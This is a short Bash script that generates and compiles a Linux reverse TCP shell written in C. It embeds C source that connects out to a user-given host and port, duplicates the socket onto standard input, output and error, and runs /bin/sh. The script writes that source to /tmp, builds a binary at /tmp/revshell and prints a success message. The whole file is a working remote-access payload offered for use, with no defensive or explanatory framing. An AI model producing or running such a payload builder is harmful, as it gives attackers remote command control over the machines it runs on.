#!/bin/bash

function C_program(){

cat <<EOF > /tmp/Cprog.c
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = $rport;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("$rhost");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);

    return 0;
}

EOF

}


function Craft_linux_C_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux C reverse tcp shell\n"
                printf "Usage bash linux_C-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

        printf "\n"
        C_program
	gcc /tmp/Cprog.c -o /tmp/revshell
	cat /tmp/Cprog.c
        printf "\n\n[\e[0;32m+\e[0m] Payload created and binary compiled at /tmp/revshell.\n"

}

Craft_linux_C_reverse_shell "$1" "$2"
